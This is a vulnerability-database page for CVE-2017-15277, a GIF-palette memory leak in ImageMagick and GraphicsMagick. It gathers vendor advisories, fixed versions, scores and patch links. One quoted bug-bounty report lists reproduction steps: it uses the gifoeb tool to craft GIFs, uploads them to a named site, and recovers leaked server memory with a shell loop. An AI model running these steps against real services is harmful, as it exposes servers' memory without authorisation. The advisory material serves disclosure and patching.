CVE-2017-15277
published 2017-10-12CVE-2017-15277: ReadGIFImage in coders/gif.c in ImageMagick 7.0.6-1 and GraphicsMagick 1.3.26 leaves the palette uninitialized when processing a GIF file that has neither a…
PriorityP341medium6.5CVSS 3.0
AVNACLPRNUIRSUCHINAN
EPSS
19.19%
97.0th percentile
ReadGIFImage in coders/gif.c in ImageMagick 7.0.6-1 and GraphicsMagick 1.3.26 leaves the palette uninitialized when processing a GIF file that has neither a global nor local palette. If the affected product is used as a library loaded into a process that operates on interesting data, this data sometimes can be leaked via the uninitialized palette.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | graphicsmagick | < graphicsmagick 1.3.26-14 (bookworm) | graphicsmagick 1.3.26-14 (bookworm) |
| debian | imagemagick | < graphicsmagick 1.3.26-14 (bookworm) | graphicsmagick 1.3.26-14 (bookworm) |
| graphicsmagick | graphicsmagick | — | — |
| graphicsmagick | graphicsmagick | >= 0 < 1.3.26-14 | 1.3.26-14 |
| graphicsmagick | graphicsmagick | >= 0 < 1.3.26-14 | 1.3.26-14 |
| graphicsmagick | graphicsmagick | >= 0 < 1.3.26-14 | 1.3.26-14 |
| graphicsmagick | graphicsmagick | >= 0 < 1.3.26-14 | 1.3.26-14 |
| imagemagick | imagemagick | — | — |
| imagemagick | imagemagick | >= 0 < 8:6.9.9.34+dfsg-3 | 8:6.9.9.34+dfsg-3 |
| imagemagick | imagemagick | >= 0 < 8:6.9.9.34+dfsg-3 | 8:6.9.9.34+dfsg-3 |
| imagemagick | imagemagick | >= 0 < 8:6.9.9.34+dfsg-3 | 8:6.9.9.34+dfsg-3 |
| imagemagick | imagemagick | >= 0 < 8:6.9.9.34+dfsg-3 | 8:6.9.9.34+dfsg-3 |
CVSS provenance
nvdv3.06.5MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:P/I:N/A:N
osv6.5MEDIUM
vendor_debian6.5MEDIUM
vendor_redhat6.5MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
GraphicsMagick vulnerabilities
vendor_ubuntu·2020-01-08
CVE-2017-14165 GraphicsMagick vulnerabilities
Title: GraphicsMagick vulnerabilities
Summary: Several security issues were fixed in GraphicsMagick.
It was discovered that GraphicsMagick incorrectly handled certain image files.
An attacker could possibly use this issue to cause a denial of service or other
unspecified impact.
Instructions: In general, a standard system update will make all the necessary changes.
Ubuntu
ImageMagick vulnerabilities
vendor_ubuntu·2018-06-12
CVE-2017-1000445 ImageMagick vulnerabilities
Title: ImageMagick vulnerabilities
Summary: Several security issues were fixed in ImageMagick.
It was discovered that ImageMagick incorrectly handled certain malformed
image files. If a user or automated system using ImageMagick were tricked
into opening a specially crafted image, an attacker could exploit this to
cause a denial of service or possibly execute code with the privileges of
the user invoking the program.
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
ImageMagick: Unitialized palette in ReadGIFImage when processing a crafted GIF file
vendor_redhat·2017-07-21·CVSS 6.5
CVE-2017-15277 [MEDIUM] CWE-200 ImageMagick: Unitialized palette in ReadGIFImage when processing a crafted GIF file
ImageMagick: Unitialized palette in ReadGIFImage when processing a crafted GIF file
ReadGIFImage in coders/gif.c in ImageMagick 7.0.6-1 and GraphicsMagick 1.3.26 leaves the palette uninitialized when processing a GIF file that has neither a global nor local palette. If the affected product is used as a library loaded into a process that operates on interesting data, this data sometimes can be leaked via the uninitialized palette.
Package: ImageMagick (Red Hat Enterprise Linux 5) - Will not fix
Package: ImageMagick (Red Hat Enterprise Linux 6) - Will not fix
Package: ImageMagick (Red Hat Enterprise Linux 7) - Will not fix
Debian
CVE-2017-15277: graphicsmagick - ReadGIFImage in coders/gif.c in ImageMagick 7.0.6-1 and GraphicsMagick 1.3.26 le...
vendor_debian·2017·CVSS 6.5
CVE-2017-15277 [MEDIUM] CVE-2017-15277: graphicsmagick - ReadGIFImage in coders/gif.c in ImageMagick 7.0.6-1 and GraphicsMagick 1.3.26 le...
ReadGIFImage in coders/gif.c in ImageMagick 7.0.6-1 and GraphicsMagick 1.3.26 leaves the palette uninitialized when processing a GIF file that has neither a global nor local palette. If the affected product is used as a library loaded into a process that operates on interesting data, this data sometimes can be leaked via the uninitialized palette.
Scope: local
bookworm: resolved (fixed in 1.3.26-14)
bullseye: resolved (fixed in 1.3.26-14)
forky: resolved (fixed in 1.3.26-14)
sid: resolved (fixed in 1.3.26-14)
trixie: resolved (fixed in 1.3.26-14)
GHSA
GHSA-844h-5pcp-3xmc: ReadGIFImage in coders/gif
ghsa_unreviewed·2022-05-14
CVE-2017-15277 [MEDIUM] CWE-200 GHSA-844h-5pcp-3xmc: ReadGIFImage in coders/gif
ReadGIFImage in coders/gif.c in ImageMagick 7.0.6-1 and GraphicsMagick 1.3.26 leaves the palette uninitialized when processing a GIF file that has neither a global nor local palette. If the affected product is used as a library loaded into a process that operates on interesting data, this data sometimes can be leaked via the uninitialized palette.
OSV
CVE-2017-15277: ReadGIFImage in coders/gif
osv·2017-10-12·CVSS 6.5
CVE-2017-15277 [MEDIUM] CVE-2017-15277: ReadGIFImage in coders/gif
ReadGIFImage in coders/gif.c in ImageMagick 7.0.6-1 and GraphicsMagick 1.3.26 leaves the palette uninitialized when processing a GIF file that has neither a global nor local palette. If the affected product is used as a library loaded into a process that operates on interesting data, this data sometimes can be leaked via the uninitialized palette.
No detection rules found.
No public exploits indexed.
HackerOne
ImageMagick GIF coder vulnerability leading to memory disclosure
hackerone·2018-07-02·CVSS 6.5
CVE-2017-15277 [MEDIUM] ImageMagick GIF coder vulnerability leading to memory disclosure
ImageMagick GIF coder vulnerability leading to memory disclosure
Due to CVE-2017-15277, portions of server memory on some steamcommunity web servers could be leaked via image updates. An attacker would not be able to control what memory would be returned, but system information could be obtained.
I was able to arbitrarily disclose server memory on steamcommunity.com due to CVE-2017-15277.
HackerOne
CVE-2017-15277 on Profile page
hackerone·2018-03-08·CVSS 6.5
CVE-2017-15277 [MEDIUM] CVE-2017-15277 on Profile page
CVE-2017-15277 on Profile page
Hi security team,
**Summary:** Please refer to #302885 for more details. Uploading a .gif produces significantly different images every time which means the server is leaking information.
## Steps To Reproduce:
1. Clone https://github.com/neex/gifoeb
2. Generate exploitable gif with ./gifoeb gen 5120x5120
3. Upload gif as a profile picture at https://www.niche.co/users/{username}/account
4. Download the preview from aws at https://niche-s3-production.s3.amazonaws.com/uploads/user/avatar/.... as preview.ext
5. run `` r=$(identify -format '%wx%h' preview.ext[0]) && for i in `seq 1 10` ; do ./gifoeb gen $r for_upload/$i.gif; done``
6. Upload the gif to the server and download the results
7. Recover the servers response with ` for p in previews/*; do ./gifo
Bugzilla
CVE-2017-15277 ImageMagick: Unitialized palette in ReadGIFImage when processing a crafted GIF file
bugzilla·2017-11-07·CVSS 6.5
CVE-2017-15277 [MEDIUM] CVE-2017-15277 ImageMagick: Unitialized palette in ReadGIFImage when processing a crafted GIF file
CVE-2017-15277 ImageMagick: Unitialized palette in ReadGIFImage when processing a crafted GIF file
ReadGIFImage in coders/gif.c in ImageMagick 7.0.6-1 leaves the palette uninitialized when processing a GIF file that has neither a global nor local palette. If the affected product is used as a library loaded into a process that operates on interesting data, this data sometimes can be leaked via the uninitialized palette.
Upstream issue:
https://github.com/ImageMagick/ImageMagick/issues/592
Upstream patch:
https://github.com/ImageMagick/ImageMagick/commit/9fd10cf630832b36a588c1545d8736539b2f1fb5
https://github.com/ImageMagick/ImageMagick/commit/9fd10cf630832b36a588c1545d8736539b2f1fb5https://github.com/ImageMagick/ImageMagick/issues/592https://github.com/neex/gifoebhttps://lists.debian.org/debian-lts-announce/2018/08/msg00002.htmlhttps://usn.ubuntu.com/3681-1/https://usn.ubuntu.com/4232-1/https://www.debian.org/security/2017/dsa-4032https://www.debian.org/security/2017/dsa-4040https://www.debian.org/security/2018/dsa-4321https://github.com/ImageMagick/ImageMagick/commit/9fd10cf630832b36a588c1545d8736539b2f1fb5https://github.com/ImageMagick/ImageMagick/issues/592https://github.com/neex/gifoebhttps://lists.debian.org/debian-lts-announce/2018/08/msg00002.htmlhttps://usn.ubuntu.com/3681-1/https://usn.ubuntu.com/4232-1/https://www.debian.org/security/2017/dsa-4032https://www.debian.org/security/2017/dsa-4040https://www.debian.org/security/2018/dsa-4321
2017-10-12
Published